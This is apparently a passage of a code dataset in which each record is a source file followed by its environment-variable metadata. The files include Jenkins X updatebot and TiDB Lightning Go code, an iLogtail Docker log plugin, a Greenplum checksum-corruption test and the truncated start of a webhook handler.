cmd.Flags().StringVarP(&eo.CommitTitle, "commit-title", "", "", "the commit title")
cmd.Flags().StringVarP(&eo.CommitMessage, "commit-message", "", "", "the commit message")
return cmd, o
}
// Run implements the command
func (o *Options) Run() error {
err := o.Validate()
if err != nil {
return errors.Wrapf(err, "failed to validate")
}
if o.PullRequestBody == "" || o.CommitMessage == "" {
// lets try discover the current git URL
gitURL, err := gitdiscovery.FindGitURLFromDir(o.Dir, true)
if err != nil {
log.Logger().Warnf("failed to find git URL %s", err.Error())
} else if gitURL != "" {
message := fmt.Sprintf("from: %s\n", gitURL)
if o.PullRequestBody == "" {
o.PullRequestBody = message
}
if o.CommitMessage == "" {
o.CommitMessage = message
}
}
}
for i := range o.UpdateConfig.Spec.Rules {
rule := &o.UpdateConfig.Spec.Rules[i]
err = o.FindURLs(rule)
if err != nil {
return errors.Wrapf(err, "failed to find URLs")
}
if len(rule.URLs) == 0 {
log.Logger().Warnf("no URLs to process for rule %d", i)
}
for _, gitURL := range rule.URLs {
if gitURL == "" {
log.Logger().Warnf("missing out repository %d as it has no git URL", i)
continue
}
// lets clear the branch name so we create a new one each time in a loop
o.BranchName = ""
source := ""
details := &scm.PullRequest{
Source: source,
Title: o.PullRequestTitle,
Body: o.PullRequestBody,
Draft: false,
}
for _, label := range o.Labels {
details.Labels = append(details.Labels, &scm.Label{
Name: label,
Description: label,
})
}
o.Function = func() error {
dir := o.OutDir
for _, ch := range rule.Changes {
err := o.ApplyChanges(dir, gitURL, ch)
if err != nil {
return errors.Wrapf(err, "failed to apply change")
}
}
if o.PullRequestTitle == "" {
o.PullRequestTitle = fmt.Sprintf("fix: upgrade to version %s", o.Version)
}
if o.CommitTitle == "" {
o.CommitTitle = o.PullRequestTitle
}
return nil
}
// reuse existing PullRequest
if o.AutoMerge {
if o.PullRequestFilter == nil {
o.PullRequestFilter = &environments.PullRequestFilter{}
}
if stringhelpers.StringArrayIndex(o.PullRequestFilter.Labels, environments.LabelUpdatebot) < 0 {
o.PullRequestFilter.Labels = append(o.PullRequestFilter.Labels, environments.LabelUpdatebot)
}
}
pr, err := o.EnvironmentPullRequestOptions.Create(gitURL, "", details, o.AutoMerge)
if err != nil {
return errors.Wrapf(err, "failed to create Pull Request on repository %s", gitURL)
}
if pr == nil {
log.Logger().Infof("no Pull Request created")
continue
}
o.AddPullRequest(pr)
}
}
return nil
}
func (o *Options) Validate() error {
if o.TemplateData == nil {
o.TemplateData = map[string]interface{}{}
}
if o.PullRequestSHAs == nil {
o.PullRequestSHAs = map[string]string{}
}
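// Version resolution order, as implemented below: the --version flag, then the version file
// (defaulting to <dir>/VERSION), then the $VERSION environment variable; --no-version
// allows all of them to be absent.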
if o.Version == "" {
if o.VersionFile == "" {
o.VersionFile = filepath.Join(o.Dir, "VERSION")
}
exists, err := files.FileExists(o.VersionFile)
if err != nil {
return errors.Wrapf(err, "failed to check for file %s", o.VersionFile)
}
if exists {
data, err := ioutil.ReadFile(o.VersionFile)
if err != nil {
return errors.Wrapf(err, "failed to read version file %s", o.VersionFile)
}
o.Version = strings.TrimSpace(string(data))
} else {
log.Logger().Infof("version file %s does not exist", o.VersionFile)
}
}
if o.Version == "" {
o.Version = os.Getenv("VERSION")
if o.Version == "" && !o.NoVersion {
return options.MissingOption("version")
}
}
// lets default the config file
if o.ConfigFile == "" {
o.ConfigFile = filepath.Join(o.Dir, ".jx", "updatebot.yaml")
}
exists, err := files.FileExists(o.ConfigFile)
if err != nil {
return errors.Wrapf(err, "failed to check for file %s", o.ConfigFile)
}
if exists {
err = yamls.LoadFile(o.ConfigFile, &o.UpdateConfig)
if err != nil {
return errors.Wrapf(err, "failed to load config file %s", o.ConfigFile)
}
} else {
log.Logger().Warnf("file %s does not exist so cannot create any updatebot Pull Requests", o.ConfigFile)
}
if o.Helmer == nil {
o.Helmer = helmer.NewHelmCLIWithRunner(o.CommandRunner, "helm", o.Dir, false)
}
// lazy create the git client
g := o.EnvironmentPullRequestOptions.Git()
_, _, err = gitclient.EnsureUserAndEmailSetup(g, o.Dir, o.GitCommitUsername, o.GitCommitUserEmail)
if err != nil {
return errors.Wrapf(err, "failed to setup git user and email")
}
// lets try default the git user/token
if o.ScmClientFactory.GitToken == "" {
if o.ScmClientFactory.GitServerURL == "" {
// lets try discover the git URL
discover := &scmhelpers.Options{
Dir: o.Dir,
GitClient: o.Git(),
CommandRunner: o.CommandRunner,
DiscoverFromGit: true,
}
err := discover.Validate()
if err != nil {
return errors.Wrapf(err, "failed to discover repository details")
}
o.ScmClientFactory.GitServerURL = discover.GitServerURL
o.ScmClientFactory.GitToken = discover.GitToken
}
if o.ScmClientFactory.GitServerURL == "" {
return errors.Errorf("no git-server could be found")
}
err = o.ScmClientFactory.FindGitToken()
if err != nil {
return errors.Wrapf(err, "failed to find git token")
}
}
if o.GitCommitUsername == "" {
o.GitCommitUsername = o.ScmClientFactory.GitUsername
}
if o.GitCommitUsername == "" {
o.GitCommitUsername = os.Getenv("GIT_USERNAME")
}
if o.GitCommitUsername == "" {
o.GitCommitUsername = "jenkins-x-bot"
}
if o.GitCredentials {
if o.ScmClientFactory.GitToken == "" {
return errors.Errorf("missing git token environment variable. Try setting GIT_TOKEN or GITHUB_TOKEN")
}
_, gc := setup.NewCmdGitSetup()
gc.Dir = o.Dir
gc.DisableInClusterTest = true
gc.UserEmail = o.GitCommitUserEmail
gc.UserName = o.GitCommitUsername
gc.Password = o.ScmClientFactory.GitToken
gc.GitProviderURL = "https://github.com"
err = gc.Run()
if err != nil {
return errors.Wrapf(err, "failed to setup git credentials file")
}
log.Logger().Infof("setup git credentials file for user %s and email %s", gc.UserName, gc.UserEmail)
}
return nil
}
// ApplyChanges applies the changes to the given dir
func (o *Options) ApplyChanges(dir, gitURL string, change v1alpha1.Change) error {
if change.Go != nil {
return o.ApplyGo(dir, gitURL, change, change.Go)
}
if change.Regex != nil {
return o.ApplyRegex(dir, gitURL, change, change.Regex)
}
if change.VersionStream != nil {
return o.ApplyVersionStream(dir, gitURL, change, change.VersionStream)
}
log.Logger().Infof("ignoring unknown change %#v", change)
return nil
}
func (o *Options) FindURLs(rule *v1alpha1.Rule) error {
for _, change := range rule.Changes {
if change.Go != nil {
err := o.GoFindURLs(rule, change, change.Go)
if err != nil {
return errors.Wrapf(err, "failed to find go repositories to update")
}
}
}
return nil
}
|
[
"\"VERSION\"",
"\"GIT_USERNAME\""
] |
[] |
[
"VERSION",
"GIT_USERNAME"
] |
[]
|
["VERSION", "GIT_USERNAME"]
|
go
| 2 | 0 | |
cmd/tidb-lightning/main.go
|
// Copyright 2019 PingCAP, Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// See the License for the specific language governing permissions and
// limitations under the License.
package main
import (
"fmt"
"os"
"os/signal"
"runtime/debug"
"syscall"
"github.com/pingcap/tidb-lightning/lightning"
"github.com/pingcap/tidb-lightning/lightning/config"
"github.com/pingcap/tidb-lightning/lightning/log"
"go.uber.org/zap"
)
func main() {
cfg := config.Must(config.LoadGlobalConfig(os.Args[1:], nil))
fmt.Fprintf(os.Stdout, "Verbose debug logs will be written to %s.\n\n", cfg.App.Config.File)
app := lightning.New(cfg)
sc := make(chan os.Signal, 1)
signal.Notify(sc,
syscall.SIGHUP,
syscall.SIGINT,
syscall.SIGTERM,
syscall.SIGQUIT)
go func() {
sig := <-sc
log.L().Info("got signal to exit", zap.Stringer("signal", sig))
app.Stop()
}()
logger := log.L()
// Lightning allocates a large number of transient objects against a small heap, so garbage
// collection runs too frequently and a lot of time is spent in the GC component.
//
// In a test loading the `order_line.csv` table of 14k TPCC,
// the time needed for the `encode kv data and write` step dropped from 52m4s to 37m30s when
// GOGC was raised from 100 to 500, and the total time needed dropped by nearly 15m as well.
// The cost is that Lightning's runtime memory grows from about 200M to 700M, which is acceptable.
// So we default the GC percentage to 500 instead of 100 to reduce GC frequency.
//
// Local mode needs much more memory than importer/tidb mode; if the GC percentage is too high,
// Lightning's memory usage will also be high.
if cfg.TikvImporter.Backend != config.BackendLocal {
gogc := os.Getenv("GOGC")
if gogc == "" {
old := debug.SetGCPercent(500)
log.L().Debug("set gc percentage", zap.Int("old", old), zap.Int("new", 500))
}
}
err := app.GoServe()
if err != nil {
logger.Error("failed to start HTTP server", zap.Error(err))
fmt.Fprintln(os.Stderr, "failed to start HTTP server:", err)
return
}
if cfg.App.ServerMode {
err = app.RunServer()
} else {
err = app.RunOnce()
}
if err != nil {
logger.Error("tidb lightning encountered error stack info", zap.Error(err))
logger.Error("tidb lightning encountered error", log.ShortError(err))
fmt.Fprintln(os.Stderr, "tidb lightning encountered error: ", err)
} else {
logger.Info("tidb lightning exit")
fmt.Fprintln(os.Stdout, "tidb lightning exit")
}
syncErr := logger.Sync()
if syncErr != nil {
fmt.Fprintln(os.Stderr, "sync log failed", syncErr)
}
if err != nil {
os.Exit(1)
}
}
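// Illustration only (not part of the upstream file): for non-local backends the GOGC
// handling above behaves as follows; the command-line arguments are placeholders.
//
//	GOGC=200 ./tidb-lightning ...   // the runtime already honours GOGC=200, so SetGCPercent is skipped
//	./tidb-lightning ...            // GOGC is unset, so debug.SetGCPercent(500) raises the default of 100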
|
[
"\"GOGC\""
] |
[] |
[
"GOGC"
] |
[]
|
["GOGC"]
|
go
| 1 | 0 | |
plugins/input/docker/logmeta/metric_docker_file.go
|
// Copyright 2021 iLogtail Authors
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//go:build linux || windows
// +build linux windows
package logmeta
import (
"encoding/json"
"fmt"
"os"
"regexp"
"strings"
"time"
"github.com/alibaba/ilogtail"
"github.com/alibaba/ilogtail/helper"
"github.com/alibaba/ilogtail/pkg/logger"
"github.com/alibaba/ilogtail/pkg/logtail"
)
const (
PluginDockerUpdateFile = 1
PluginDockerDeleteFile = 2
PluginDockerUpdateFileAll = 3
)
type DockerFileUpdateCmd struct {
ID string
Path string
Tags []string
}
type DockerFileUpdateCmdAll struct {
AllCmd []DockerFileUpdateCmd
}
type InputDockerFile struct {
IncludeLabel map[string]string // Deprecated: use IncludeContainerLabel and IncludeK8sLabel instead.
ExcludeLabel map[string]string // Deprecated: use ExcludeContainerLabel and ExcludeK8sLabel instead.
IncludeEnv map[string]string
ExcludeEnv map[string]string
IncludeContainerLabel map[string]string
ExcludeContainerLabel map[string]string
IncludeK8sLabel map[string]string
ExcludeK8sLabel map[string]string
ExternalEnvTag map[string]string
ExternalK8sLabelTag map[string]string
LogPath string
MountPath string
HostFlag bool
K8sNamespaceRegex string
K8sPodRegex string
K8sContainerRegex string
includeLabelRegex map[string]*regexp.Regexp
excludeLabelRegex map[string]*regexp.Regexp
includeEnvRegex map[string]*regexp.Regexp
excludeEnvRegex map[string]*regexp.Regexp
k8sFilter *helper.K8SFilter
dockerCenter *helper.DockerCenter
lastPathMappingCache map[string]string
context ilogtail.Context
lastClearTime time.Time
updateEmptyFlag bool
avgInstanceMetric ilogtail.CounterMetric
addMetric ilogtail.CounterMetric
updateMetric ilogtail.CounterMetric
deleteMetric ilogtail.CounterMetric
lastUpdateTime int64
// Last return of GetAllAcceptedInfoV2
fullList map[string]bool
matchList map[string]*helper.DockerInfoDetail
}
func formatPath(path string) string {
if len(path) == 0 {
return path
}
if path[len(path)-1] == '/' {
return path[0 : len(path)-1]
}
if path[len(path)-1] == '\\' {
return path[0 : len(path)-1]
}
return path
}
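// For illustration (not in the original plugin): formatPath trims at most one
// trailing separator, e.g. formatPath("/var/log/") == "/var/log" and
// formatPath(`C:\logs\`) == `C:\logs`.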
func (idf *InputDockerFile) Name() string {
return "InputDockerFile"
}
func (idf *InputDockerFile) Init(context ilogtail.Context) (int, error) {
idf.context = context
idf.lastPathMappingCache = make(map[string]string)
idf.fullList = make(map[string]bool)
idf.matchList = make(map[string]*helper.DockerInfoDetail)
// Docker on Windows converts all mounted paths to lowercase (see the Mounts
// field in the output of docker inspect), so we have to change LogPath to
// lowercase if it is a Windows path (i.e. one containing a colon).
idf.LogPath = formatPath(idf.LogPath)
if colonPos := strings.Index(idf.LogPath, ":"); colonPos != -1 {
idf.LogPath = strings.ToLower(idf.LogPath)
}
idf.lastClearTime = time.Now()
if len(idf.LogPath) <= 1 {
return 0, fmt.Errorf("empty log path")
}
idf.dockerCenter = helper.GetDockerCenterInstance()
if idf.HostFlag {
idf.MountPath = ""
} else if envPath := os.Getenv("ALIYUN_LOGTAIL_MOUNT_PATH"); len(envPath) > 0 {
if envPath[len(envPath)-1] == '/' || envPath[len(envPath)-1] == '\\' {
envPath = envPath[0 : len(envPath)-1]
}
idf.MountPath = envPath
} else {
idf.MountPath = helper.DefaultLogtailMountPath
}
idf.updateEmptyFlag = true
idf.avgInstanceMetric = helper.NewAverageMetric("container_count")
idf.addMetric = helper.NewCounterMetric("add_container")
idf.deleteMetric = helper.NewCounterMetric("remove_container")
idf.updateMetric = helper.NewCounterMetric("update_container")
idf.context.RegisterCounterMetric(idf.avgInstanceMetric)
idf.context.RegisterCounterMetric(idf.addMetric)
idf.context.RegisterCounterMetric(idf.deleteMetric)
idf.context.RegisterCounterMetric(idf.updateMetric)
var err error
idf.IncludeEnv, idf.includeEnvRegex, err = helper.SplitRegexFromMap(idf.IncludeEnv)
if err != nil {
logger.Warning(idf.context.GetRuntimeContext(), "INVALID_REGEX_ALARM", "init include env regex error", err)
}
idf.ExcludeEnv, idf.excludeEnvRegex, err = helper.SplitRegexFromMap(idf.ExcludeEnv)
if err != nil {
logger.Warning(idf.context.GetRuntimeContext(), "INVALID_REGEX_ALARM", "init exclude env regex error", err)
}
if idf.IncludeLabel != nil {
for k, v := range idf.IncludeContainerLabel {
idf.IncludeLabel[k] = v
}
} else {
idf.IncludeLabel = idf.IncludeContainerLabel
}
if idf.ExcludeLabel != nil {
for k, v := range idf.ExcludeContainerLabel {
idf.ExcludeLabel[k] = v
}
} else {
idf.ExcludeLabel = idf.ExcludeContainerLabel
}
idf.IncludeLabel, idf.includeLabelRegex, err = helper.SplitRegexFromMap(idf.IncludeLabel)
if err != nil {
logger.Warning(idf.context.GetRuntimeContext(), "INVALID_REGEX_ALARM", "init include label regex error", err)
}
idf.ExcludeLabel, idf.excludeLabelRegex, err = helper.SplitRegexFromMap(idf.ExcludeLabel)
if err != nil {
logger.Warning(idf.context.GetRuntimeContext(), "INVALID_REGEX_ALARM", "init exclude label regex error", err)
}
idf.k8sFilter, err = helper.CreateK8SFilter(idf.K8sNamespaceRegex, idf.K8sPodRegex, idf.K8sContainerRegex, idf.IncludeK8sLabel, idf.ExcludeK8sLabel)
return 3000, err
}
func (idf *InputDockerFile) Description() string {
return "docker file plugin for logtail"
}
func (idf *InputDockerFile) addMappingToLogtail(info *helper.DockerInfoDetail, destPath string, allCmd *DockerFileUpdateCmdAll) {
var cmd DockerFileUpdateCmd
cmd.ID = info.ContainerInfo.ID
cmd.Path = destPath
tags := info.GetExternalTags(idf.ExternalEnvTag, idf.ExternalK8sLabelTag)
cmd.Tags = make([]string, 0, len(tags)*2)
for key, val := range tags {
cmd.Tags = append(cmd.Tags, key)
cmd.Tags = append(cmd.Tags, val)
}
cmdBuf, _ := json.Marshal(&cmd)
configName := idf.context.GetConfigName()
if allCmd != nil {
allCmd.AllCmd = append(allCmd.AllCmd, cmd)
return
}
if err := logtail.ExecuteCMD(configName, PluginDockerUpdateFile, cmdBuf); err != nil {
logger.Error(idf.context.GetRuntimeContext(), "DOCKER_FILE_MAPPING_ALARM", "cmd", cmdBuf, "error", err)
}
}
func (idf *InputDockerFile) deleteMappingFromLogtail(id string) {
var cmd DockerFileUpdateCmd
cmd.ID = id
logger.Info(idf.context.GetRuntimeContext(), "deleteMappingFromLogtail cmd", cmd)
cmdBuf, _ := json.Marshal(&cmd)
configName := idf.context.GetConfigName()
if err := logtail.ExecuteCMD(configName, PluginDockerDeleteFile, cmdBuf); err != nil {
logger.Error(idf.context.GetRuntimeContext(), "DOCKER_FILE_MAPPING_ALARM", "cmd", cmdBuf, "error", err)
}
}
func (idf *InputDockerFile) updateAll(allCmd *DockerFileUpdateCmdAll) {
logger.Info(idf.context.GetRuntimeContext(), "update all", len(allCmd.AllCmd))
cmdBuf, _ := json.Marshal(allCmd)
configName := idf.context.GetConfigName()
if err := logtail.ExecuteCMD(configName, PluginDockerUpdateFileAll, cmdBuf); err != nil {
logger.Error(idf.context.GetRuntimeContext(), "DOCKER_FILE_MAPPING_ALARM", "cmd", cmdBuf, "error", err)
}
}
func (idf *InputDockerFile) updateMapping(info *helper.DockerInfoDetail, sourcePath, containerPath string, allCmd *DockerFileUpdateCmdAll) {
sourcePath = formatPath(sourcePath)
containerPath = formatPath(containerPath)
destPath := helper.GetMountedFilePathWithBasePath(idf.MountPath, sourcePath) + idf.LogPath[len(containerPath):]
if val, ok := idf.lastPathMappingCache[info.ContainerInfo.ID]; ok && val != sourcePath {
// send delete first and then add this info
idf.updateMetric.Add(1)
logger.Info(idf.context.GetRuntimeContext(), "container mapping", "changed", "last", val, "source host path", sourcePath, "destination container path", containerPath, "destination log path", destPath, "id", info.ContainerInfo.ID, "name", info.ContainerInfo.Name)
idf.lastPathMappingCache[info.ContainerInfo.ID] = sourcePath
idf.addMappingToLogtail(info, destPath, allCmd)
} else if !ok {
idf.addMetric.Add(1)
logger.Info(idf.context.GetRuntimeContext(), "container mapping", "added", "source host path", sourcePath, "destination container path", containerPath, "destination log path", destPath, "id", info.ContainerInfo.ID, "name", info.ContainerInfo.Name)
idf.lastPathMappingCache[info.ContainerInfo.ID] = sourcePath
idf.addMappingToLogtail(info, destPath, allCmd)
}
}
func (idf *InputDockerFile) deleteMapping(id string) {
idf.deleteMappingFromLogtail(id)
logger.Info(idf.context.GetRuntimeContext(), "container mapping", "deleted", "source path", idf.lastPathMappingCache[id], "id", id)
delete(idf.lastPathMappingCache, id)
}
func (idf *InputDockerFile) Collect(collector ilogtail.Collector) error {
newUpdateTime := idf.dockerCenter.GetLastUpdateMapTime()
if idf.lastUpdateTime != 0 {
// Nothing update, just skip.
if idf.lastUpdateTime >= newUpdateTime {
return nil
}
}
var allCmd *DockerFileUpdateCmdAll
// if cache is empty, use update all cmd
if len(idf.lastPathMappingCache) == 0 {
allCmd = new(DockerFileUpdateCmdAll)
}
newCount, delCount := idf.dockerCenter.GetAllAcceptedInfoV2(
idf.fullList, idf.matchList,
idf.IncludeLabel, idf.ExcludeLabel,
idf.includeLabelRegex, idf.excludeLabelRegex,
idf.IncludeEnv, idf.ExcludeEnv,
idf.includeEnvRegex, idf.excludeEnvRegex,
idf.k8sFilter)
idf.lastUpdateTime = newUpdateTime
if newCount != 0 || delCount != 0 {
logger.Infof(idf.context.GetRuntimeContext(), "update match list, new: %v, delete: %v", newCount, delCount)
// We cannot return here because we still need to notify an empty update to
// clear the cache in docker_path_config.json.
}
dockerInfoDetails := idf.matchList
idf.avgInstanceMetric.Add(int64(len(dockerInfoDetails)))
for _, info := range dockerInfoDetails {
sourcePath, containerPath := info.FindBestMatchedPath(idf.LogPath)
logger.Debugf(idf.context.GetRuntimeContext(), "container(%s-%s) bestMatchedPath for %s : sourcePath-%s, containerPath-%s",
info.ContainerInfo.ID, info.ContainerInfo.Name, idf.LogPath, sourcePath, containerPath)
if len(sourcePath) > 0 {
idf.updateMapping(info, sourcePath, containerPath, allCmd)
} else {
logger.Warning(idf.context.GetRuntimeContext(), "DOCKER_FILE_MATCH_ALARM", "unknow error", "can't find path from this container", "path", idf.LogPath, "container", info.ContainerInfo.Name)
}
}
for id := range idf.lastPathMappingCache {
if _, ok := dockerInfoDetails[id]; !ok {
idf.deleteMetric.Add(1)
idf.deleteMapping(id)
}
}
if allCmd != nil {
if len(allCmd.AllCmd) == 0 {
// only update empty if empty flag is true
if idf.updateEmptyFlag {
idf.updateAll(allCmd)
idf.updateEmptyFlag = false
}
} else {
idf.updateAll(allCmd)
idf.updateEmptyFlag = true
}
}
if time.Since(idf.lastClearTime) > time.Hour {
idf.lastPathMappingCache = make(map[string]string)
idf.lastClearTime = time.Now()
}
return nil
}
func init() {
ilogtail.MetricInputs["metric_docker_file"] = func() ilogtail.MetricInput {
return &InputDockerFile{}
}
}
|
[
"\"ALIYUN_LOGTAIL_MOUNT_PATH\""
] |
[] |
[
"ALIYUN_LOGTAIL_MOUNT_PATH"
] |
[]
|
["ALIYUN_LOGTAIL_MOUNT_PATH"]
|
go
| 1 | 0 | |
src/test/tinc/tincrepo/mpp/gpdb/tests/storage/access_methods/appendonly_checksum/test_appendonly_checksum_scenario.py
|
"""
Copyright (C) 2004-2015 Pivotal Software, Inc. All rights reserved.
This program and the accompanying materials are made available under
the terms of the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import glob
import sys
import tinctest
import commands
from mpp.lib.PSQL import PSQL
from mpp.models import MPPTestCase
from tinctest.lib import local_path, Gpdiff
from tinctest.models.scenario import ScenarioTestCase
from mpp.gpdb.tests.storage.lib.gp_filedump import GpfileTestCase
from gppylib.commands.base import Command, ExecutionError
class CONST(object):
''' For test_ao_checksum_corruption '''
HEADER_OFFSET = 8
DATA_OFFSET = -3
FIND_CHAR = 'a'
CORRUPTION = '*'
ERR_MSG = 'ERROR: Header checksum does not match'
BOF = 0
EOF = 2
''' For test_aochecksum_size '''
CHKSUM_OFF = 'off'
CHKSUM_ON = 'on'
SMALL_HEADER_LEN_WITH_CHKSUM_ON = 'headerLen: 24'
SMALL_HEADER_LEN_WITH_CHKSUM_OFF = 'headerLen: 16'
LARGE_HEADER_LEN_WITH_CHKSUM_ON = 'headerLen: 24'
LARGE_HEADER_LEN_WITH_CHKSUM_OFF = 'headerLen: 16'
BULKDENSE_HEADER_LEN_WITH_CHKSUM_ON = 'headerLen: 32'
BULKDENSE_HEADER_LEN_WITH_CHKSUM_OFF = 'headerLen: 24'
SMALL_HEADER_TYPE = 'AoHeaderKind_SmallContent'
LARGE_HEADER_TYPE = 'AoHeaderKind_LargeContent'
BULKDENSE_HEADER_TYPE = 'DatumStreamVersion_Dense'
class AppendonlyChecksumTestCase(ScenarioTestCase, MPPTestCase):
'''
@gucs gp_create_table_random_default_distribution=off
@dbname gptest
@description Test for Appendonly Checksum
@product_version gpdb: [4.3.4.0-]
'''
def __init__(self, methodName):
super(AppendonlyChecksumTestCase,self).__init__(methodName)
self.gpfile = GpfileTestCase()
self.dbname=os.environ.get('PGDATABASE')
@classmethod
def setUpClass(cls):
base_dir = os.path.dirname(sys.modules[cls.__module__].__file__)
test_out_dir=os.path.join( base_dir,"output_scenario")
try:
os.mkdir(test_out_dir)
except OSError as e:
tinctest.logger.info( "create output_scenario dir error %s " % format(e.strerror))
@classmethod
def create_table(cls,tab_name):
base_dir = os.path.dirname(sys.modules[cls.__module__].__file__)
sql_file = os.path.join( base_dir, "sql_scenario", tab_name + ".sql");
ans_file = os.path.join( base_dir, "expected_scenario", tab_name + ".ans");
out_file = os.path.join( base_dir, "output_scenario", tab_name + ".out");
''' Run the provided sql and validate it '''
PSQL.run_sql_file(sql_file,out_file=out_file)
''' Compare the out and ans files '''
result = Gpdiff.are_files_equal(out_file, ans_file)
errmsg='Gpdiff are not equal for file '+ sql_file
assert result, errmsg
@classmethod
def select_table(cls,tab_name, noncorrupted_checksum=True):
base_dir = os.path.dirname(sys.modules[cls.__module__].__file__)
sql_file = os.path.join( base_dir, "sql_scenario", tab_name + ".sql");
ans_file = os.path.join( base_dir, "expected_scenario", tab_name + ".ans");
out_file = os.path.join( base_dir, "output_scenario", tab_name + ".out");
''' Run the provided sql and validate it '''
PSQL.run_sql_file(sql_file,out_file=out_file)
if noncorrupted_checksum:
''' Compare the out and ans files '''
result = Gpdiff.are_files_equal(out_file, ans_file)
errmsg='Gpdiff are not equal for file '+ sql_file
assert result, errmsg
else:
''' Verification for corruption case '''
find_msg="grep -c " +"'"+ CONST.ERR_MSG + "' "+out_file
tinctest.logger.info('Find Error Message : %s ' % find_msg)
status, result=commands.getstatusoutput(find_msg)
assert int(result) > 0, "Did not find message " + CONST.ERR_MSG
def test_ao_checksum_corruption(self):
'''
The following test simulates corruption of header and data content and verifies the select behavior
on this corrupted table.
The test also verifies the behavior of GUC gp_appendonly_verify_block_checksums(on/off) if the last data-block is
corrupted
PARAMETERS (via data_provider):
0. Test Name
1. Sql file to create scenario. This is also used in verification because for every test sql file
there is also a count_ sql file. (verify_sql variable below is populated with this value for each test)
2. Starting position in data file from where position will be calculated for corruption
3. (For the appendonly_verify_block_checksums_co test only) The character in the data file that will be
flipped to uppercase to simulate corruption of the last record, resulting in a different checksum
3. (All others) Location in the data file that will be corrupted. CONST.CORRUPTION will be used as the new character
that overwrites a location in the data file, resulting in a different checksum
STEPS :
1. Create a table with the required type of header (large header_content or small header_content (ao/co))
2. Find the data file for this relation
3. Take a backup before corruption
4. For the appendonly_verify_block_checksums_co test, from the eof find the first occurrence of CONST.FIND_CHAR.
For all others, from the corruption_start position find the corruption_offset location. For tests that corrupt the
header content the corruption_start is bof, and for tests that corrupt the data content the start position
is eof.
5. Run the count_ sql corresponding to the test and verify that the out file contains CONST.ERR_MSG
6. Replace the corrupt data file with the original file (see step 3)
7. Re-run the count_ sql corresponding to the test and verify that it passes its comparison with the ans file
@data_provider data_provider_for_checksum_corruption
'''
test_name = self.test_data[0]
tab_name = self.test_data[1][0]
corruption_start = self.test_data[1][1]
corruption_offset = 0
corruption_char= ''
if type(self.test_data[1][2]) == type(0) :
'''
Find the location that will be corrupted for all tests except appendonly_verify_block_checksums_co
'''
corruption_offset = self.test_data[1][2]
else:
'''
Find the character that will be flipped with the reverse case for test appendonly_verify_block_checksums_co only
'''
corruption_char=self.test_data[1][2]
tinctest.logger.info('=======================================')
tinctest.logger.info('Starting Test %s' % test_name)
tinctest.logger.info('Table Name %s' % tab_name)
tinctest.logger.info('corruption start position %s' % corruption_start)
tinctest.logger.info('corruption offset position %s' % corruption_offset)
tinctest.logger.info('corruption character %s' % corruption_char)
tinctest.logger.info('=======================================')
self.create_table(tab_name)
(host, db_path) = self.gpfile.get_host_and_db_path(self.dbname)
tinctest.logger.info('Hostname=%s data_directory=%s' %(host,db_path))
file_list = self.gpfile.get_relfile_list(self.dbname, tab_name, db_path, host)
data_file=db_path+'/'+file_list[0]
''' Take a backup of the data file before corruption '''
cmd = "cp -f "+ data_file +" " + data_file +".bak"
tinctest.logger.info("Backup data-file : %s" % cmd)
Command("Backup data-file", cmd).run(validateAfter=True)
try:
with open(data_file , "r+") as f:
char_location=0
write_char=CONST.CORRUPTION
verify_sql='count_'+tab_name
''' For appendonly_verify_block_checksums test only '''
if corruption_char == CONST.FIND_CHAR:
while (True):
char_location +=(-1)
f.seek(char_location,corruption_start)
if (f.read(1) == corruption_char):
corruption_offset=char_location
write_char=CONST.FIND_CHAR.upper()
verify_sql='count_appendonly_verify_block_checksums_co_on'
break
f.seek(corruption_offset,corruption_start)
f.write(write_char)
except IOError as e:
errmsg="I/O error({0}): {1}".format(e.errno, e.strerror)
tinctest.logger.info("%s" % errmsg)
except:
errmsg = "Unexpected error: {0}".format(sys.exc_info()[0])
tinctest.logger.info("%s" % errmsg)
raise
# The "with" block above already closes the file, so no explicit close is needed here.
self.select_table(verify_sql,noncorrupted_checksum=False)
if corruption_char == 'a':
self.select_table('count_appendonly_verify_block_checksums_co_off',noncorrupted_checksum=True)
'''Replace the corrupted data file with the good one from backup taken earlier'''
cmd = "cp -f "+ data_file+".bak " + data_file
tinctest.logger.info("Restore data-file from backup : %s" % cmd)
Command("Restore data-file", cmd).run(validateAfter=True)
self.select_table(verify_sql,noncorrupted_checksum=True)
@tinctest.dataProvider('data_provider_for_checksum_corruption')
def test_data_provider_for_checksum_corruption():
data = {
"chksum_on_corrupt_header_largecontent_co":['chksum_on_corrupt_header_large_co',CONST.BOF,CONST.HEADER_OFFSET],
"chksum_on_corrupt_content_largecontent_co":['chksum_on_corrupt_header_large_co',CONST.EOF,CONST.DATA_OFFSET],
"chksum_on_corrupt_header_smallcontent_co":['chksum_on_header_sml_co',CONST.BOF,CONST.HEADER_OFFSET],
"chksum_on_corrupt_content_smallcontent_co":['chksum_on_header_sml_co',CONST.EOF,CONST.DATA_OFFSET],
"chksum_on_corrupt_header_smallcontent_ao":['chksum_on_header_sml_ao',CONST.BOF,CONST.HEADER_OFFSET],
"chksum_on_corrupt_content_smallcontent_ao":['chksum_on_header_sml_ao',CONST.EOF,CONST.DATA_OFFSET],
"appendonly_verify_block_checksums_co":['appendonly_verify_block_checksums_co',CONST.EOF,CONST.FIND_CHAR]
}
return data
|
[] |
[] |
[
"PGDATABASE"
] |
[]
|
["PGDATABASE"]
|
python
| 1 | 0 | |
internal/handler/hook_handler.go
|
package handler
import (
"log"
"net/http"
"os"
"regexp"
"strings"
"github.com/PuerkitoBio/goquery"
"github.com/t1732/inventory-notification/internal/notifier"
)
func HookHandler(w http.ResponseWriter, r *http.Request) {
log.Print("hookHandler call")
targetUrl := os.Getenv("TARGET_URL")
if targetUrl == "" {
